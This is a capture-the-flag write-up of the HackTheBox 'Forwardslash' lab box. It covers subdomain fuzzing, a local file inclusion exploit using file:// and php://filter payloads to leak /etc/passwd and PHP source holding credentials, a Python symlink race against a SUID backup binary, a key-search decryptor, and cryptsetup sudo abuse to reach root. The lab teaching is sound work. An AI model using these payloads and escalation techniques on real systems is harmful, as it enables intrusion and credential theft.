HacktheBox Forwardslash Write-up

Swar Shah
Published in InfoSec Write-ups
6 min read · Jul 4, 2020


In this write-up we exploit the Forwardslash box from HackTheBox. The box starts with enumeration (including a subdomain / virtual-host brute force), continues with a Local File Inclusion (LFI) vulnerability that leaks PHP source and credentials, gives us a shell, and ends with post-exploitation to reach a root shell.

Enumeration

I started the enumeration with nmapAutomator, which wraps nmap's port and service scans:

cmd = "./nmapAutomator.sh 10.10.10.183 All"

Nmap scan report for 10.10.10.183
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3c:3b:eb:54:96:81:1d:da:d7:96:c7:0f:b4:7e:e1:cf (RSA)
| 256 f6:b3:5f:a2:59:e3:1e:57:35:36:c3:fe:5e:3d:1f:66 (ECDSA)
|_ 256 1b:de:b8:07:35:e8:18:2c:19:d8:cc:dd:77:9c:f2:5e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://forwardslash.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds

Two ports are open: 22 and 80. Before moving to exploitation, a quick look at what they tell us. Port 22 is SSH (OpenSSH 7.6p1, the version shipped with Ubuntu 18.04). Port 80 is an Apache 2.4.29 web server, and the http-title line shows that it redirects to http://forwardslash.htb, so that hostname has to be added to /etc/hosts before the site can be browsed.

Running the usual web enumeration tools (nikto, gobuster, dirbuster) against forwardslash.htb gave no lead, so I moved on to subdomain (virtual host) enumeration with wfuzz:

cmd = "wfuzz --hh 0 -H 'Host: FUZZ.forwardslash.htb' -u http://10.10.10.183/ --hc 400 -w /usr/share/wordlists/wfuzz/general/common.txt -c"

-H 'Host: FUZZ.forwardslash.htb' = put each wordlist entry into the Host header, so we are fuzzing virtual hosts rather than paths

--hh 0 = hide responses whose body is 0 characters long

--hc 400 = hide responses with HTTP status code 400

-c = colour the output

wfuzz found the subdomain backup.forwardslash.htb. Add it to /etc/hosts next to the main hostname (e.g. "10.10.10.183 forwardslash.htb backup.forwardslash.htb") and browse to it: it serves a login page.

Registering a new user and signing in takes us to a dashboard. Looking through its functionality, there is a feature to change the profile picture by supplying an image URL: a server-side fetch of a user-controlled URL, which immediately suggests a Local File Inclusion (LFI) vulnerability. The URL text box and the submit button are disabled in the HTML, so they have to be re-enabled first (remove the disabled attributes in the browser's developer tools) before anything can be entered and submitted.

Trying some common payloads, "file:///etc/passwd" works and returns the contents of /etc/passwd, confirming the LFI.

While brute-forcing directories on the backup vhost we also found a /dev/ directory, but requesting it only returns a permission denied message, and pulling it through the LFI gives the same result. That is what you would expect if the file is being included and executed as PHP (access check and all) rather than read and returned as text.

Exploitation

Since the file is being included as PHP, we can use a PHP stream wrapper to read its source without executing it: php://filter with the convert.base64-encode filter returns the file base64-encoded, so the PHP inside it never runs. PayloadsAllTheThings has a good reference on LFI wrappers.

payload = "php://filter/convert.base64-encode/resource=file:///var/www/backup.forwardslash.htb/dev/index.php"

This returns the contents of /dev/index.php as base64. Decoding it reveals FTP credentials for the user chiv. There is no FTP port open, though, so the obvious thing to check is whether the same password is reused for SSH:
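The wrapper step above, as an added example rather than code from the write-up: it builds the php://filter payload for a given resource, scans the page that echoes the result back for a base64 run that decodes to PHP source, and pulls simple $var = '...'; assignments (such as FTP credentials) out of the decoded file. The response body, the PHP source and the credential values in it are constructed for illustration; the real page layout and values are not shown on this page.

```python
import base64
import re
from typing import Dict, Optional

# Added example, not the write-up's own code. Builds the php://filter payload
# for an include()-style LFI and recovers PHP source from a page that echoes
# the (base64-encoded) include result back to the browser.

PHP_OPEN = "<?php"


def filter_payload(path: str) -> str:
    """php://filter wraps the include target so PHP returns the file
    base64-encoded instead of executing it, which is why the access check in
    the included script never runs."""
    return f"php://filter/convert.base64-encode/resource={path}"


def recover_php_source(body: str) -> Optional[str]:
    """Find base64 runs in an HTML response, decode each one and return the
    first that looks like PHP source. Returns None if nothing decodes to PHP."""
    for blob in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.lstrip().startswith(PHP_OPEN):
            return text
    return None


def extract_credentials(source: str) -> Dict[str, str]:
    """Pull $var = 'value'; style scalar assignments (e.g. an FTP user and
    password) out of decoded PHP source. Only quoted scalars are handled."""
    pairs = re.findall(r"\$(\w+)\s*=\s*['\"]([^'\"]*)['\"]\s*;", source)
    return dict(pairs)


# Constructed sample (not from the box): what the LFI page might echo back,
# with the encoded source embedded in an <img> tag. Values are made up.
SAMPLE_SOURCE = """<?php
$ftp_user = 'exampleuser';
$ftp_pass = 'examplepass';
if ($_SERVER['REMOTE_ADDR'] != '127.0.0.1') { die('Permission Denied'); }
"""
SAMPLE_BODY = (
    '<html><body><img src="'
    + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
    + '"></body></html>'
)

if __name__ == "__main__":
    print(filter_payload("file:///var/www/backup.forwardslash.htb/dev/index.php"))
    src = recover_php_source(SAMPLE_BODY)
    print(src)
    print(extract_credentials(src or ""))
```

The decode step checks for the "<?php" marker rather than trusting any base64-looking run, because a page can easily contain other long base64 strings (inline images, tokens) that would otherwise be mistaken for the leaked file.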

cmd = ssh chiv@10.10.10.183

With a shell as chiv, I ran the usual Linux privilege escalation checks (LinEnum) for post-exploitation. Two things stood out in the results: a SUID binary called backup owned by the user pain, and a file config.php.bak, also owned by pain, on which chiv has no read, write or execute permission.

Running the backup binary prints a different hash every time. Its output describes itself as a time-based backup viewer, so the hash is most likely an MD5 of the current timestamp including seconds, which is why it changes on every run. To check this hypothesis I wrote a small bash script that computes the MD5 of the current time and compares it with what the binary prints.

The script takes the current time, hashes it with md5, creates a symlink from that hash to config.php.bak, and runs the backup binary within the same second. The binary opens the file named after the hash, follows the symlink, and prints the contents of config.php.bak.
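The same race, written out as an added Python example (it is not the author's bash script, which is not reproduced on this page). It assumes the binary hashes the current time formatted as HH:MM:SS with no trailing newline; the paths to the binary and to config.php.bak used in the usage line are assumptions as well.

```python
import hashlib
import os
import subprocess
import tempfile
import time
from typing import Optional

# Added example (not the author's script). Hypothesis from the write-up: the SUID
# "backup" binary MD5-hashes the current timestamp (with seconds) and opens a
# file of that name in the working directory. ASSUMPTION: the time format is
# HH:MM:SS and the string is hashed without a trailing newline.
TIME_FORMAT = "%H:%M:%S"


def hash_for_time(stamp: str) -> str:
    """MD5 hex digest of the timestamp string as the binary is assumed to hash it."""
    return hashlib.md5(stamp.encode()).hexdigest()


def new_workdir() -> str:
    """Scratch directory to run the binary in, so the planted link is in its cwd."""
    return tempfile.mkdtemp(prefix="backup-race-")


def link_target_for_time(stamp: str, target: str, workdir: str) -> str:
    """Create <workdir>/<md5(stamp)> as a symlink to target and return its path.
    The binary resolves the file name from the time, so a symlink with that
    name makes it read `target` (e.g. config.php.bak) instead."""
    link = os.path.join(workdir, hash_for_time(stamp))
    if os.path.lexists(link):
        os.remove(link)
    os.symlink(target, link)
    return link


def link_resolves(link: str) -> str:
    """What a planted symlink points at (used to confirm it was created correctly)."""
    return os.readlink(link)


def run_backup(binary: str, target: str, workdir: Optional[str] = None) -> str:
    """Plant the link for the current second and run the binary in that same
    second. Sleeping until the next second boundary first gives the link and
    the run the widest possible window with an identical timestamp."""
    workdir = workdir or new_workdir()
    time.sleep(1 - (time.time() % 1))
    stamp = time.strftime(TIME_FORMAT)
    link_target_for_time(stamp, target, workdir)
    proc = subprocess.run([binary], cwd=workdir, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # Assumed paths: the write-up does not state where the binary lives.
    print(run_backup("/usr/bin/backup",
                     "/var/www/backup.forwardslash.htb/config.php.bak"))
```

If the binary checks a different format (for example with a date prefix), only TIME_FORMAT needs to change; comparing hash_for_time(time.strftime(...)) with the hash the binary prints is the quickest way to confirm the format before racing it.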

That gives us the password of the user pain. Now on to post-exploitation as pain.

Post Exploitation

First, check what we are allowed to run as root (sudo -l):

cryptsetup opens encrypted (LUKS) volumes, typically backup images, and maps the decrypted contents as a block device under /dev/mapper. Once mapped, the device can be mounted on any directory and its files read, so being able to run cryptsetup as root is the lead to follow.

There is also an encryptorinator directory containing a custom encryption script and a ciphertext. After going through the code, I modified the decryption routine to try candidate keys and check each decrypted message for common English words; if the words are there, that key is the right one and the output is the message.

Running the modified decrypt.py gave me the key and the password.
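The key search described above, as an added example; it is not the box's encryptorinator code, which the write-up does not reproduce. The cipher here is a stand-in (byte-wise addition of a repeating key, mod 256) so the block runs on its own; on the box you would pass the real decrypt() function to find_key instead. The message, key and wordlist are constructed.

```python
import string
from typing import Callable, Iterable, Optional, Tuple

# Added example, not the box's script. Shows the author's approach: try candidate
# keys and accept the one whose decryption contains common words. STAND-IN
# cipher below; the real encryptorinator decrypt() is a drop-in replacement.

COMMON_WORDS = ("the", "password", "is", "key", "for", "backup", "and", "you")


def encrypt(key: str, msg: str) -> bytes:
    """Stand-in cipher: add the repeating key to each byte, mod 256."""
    k = key.encode()
    return bytes((b + k[i % len(k)]) % 256 for i, b in enumerate(msg.encode()))


def decrypt(key: str, data: bytes) -> str:
    """Inverse of the stand-in cipher; latin-1 so every byte maps to a character."""
    k = key.encode()
    return bytes((b - k[i % len(k)]) % 256 for i, b in enumerate(data)).decode("latin-1")


def score_plaintext(text: str, words: Iterable[str] = COMMON_WORDS) -> int:
    """Count how many of the common words appear as whole, lowercase tokens."""
    cleaned = text.lower().translate(str.maketrans("", "", string.punctuation))
    tokens = set(cleaned.split())
    return sum(1 for w in words if w in tokens)


def find_key(data: bytes, candidates: Iterable[str],
             decrypt_fn: Callable[[str, bytes], str] = decrypt,
             min_score: int = 2) -> Optional[Tuple[str, str, int]]:
    """Return (key, plaintext, score) for the best-scoring candidate that reaches
    min_score, or None. Requiring more than one word avoids accepting a garbage
    decryption that happens to contain a short word like 'is' or 'the'."""
    best = None
    for key in candidates:
        try:
            plain = decrypt_fn(key, data)
        except Exception:
            continue  # e.g. empty key; a bad candidate is just skipped
        s = score_plaintext(plain)
        if s >= min_score and (best is None or s > best[2]):
            best = (key, plain, s)
    return best


# Constructed demo data (made up, not from the box).
DEMO_MESSAGE = "the password for the backup is Sup3rS3cret!"
DEMO_KEY = "hunter2"
DEMO_CIPHERTEXT = encrypt(DEMO_KEY, DEMO_MESSAGE)
DEMO_WORDLIST = ["letmein", "qwerty", "hunter2", "password1", "admin"]

if __name__ == "__main__":
    print(find_key(DEMO_CIPHERTEXT, DEMO_WORDLIST))
```

Scoring on whole words rather than substrings matters: random bytes decoded as latin-1 contain plenty of letters, and a substring match on "is" or "the" would fire on garbage far too often to be useful.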

Now we can map the image in /var/backups/recovery, entering the password "cB!6%sdH8Lj^@Y*$C2cf" when prompted:

cmd = sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup

A new mapped device (backup) now appears under /dev/mapper. With it in place we can mount it on /mnt (sudo mount /dev/mapper/backup /mnt) and read the files inside, which include the root user's SSH private key.

Log in as root over SSH with that private key and read root.txt.

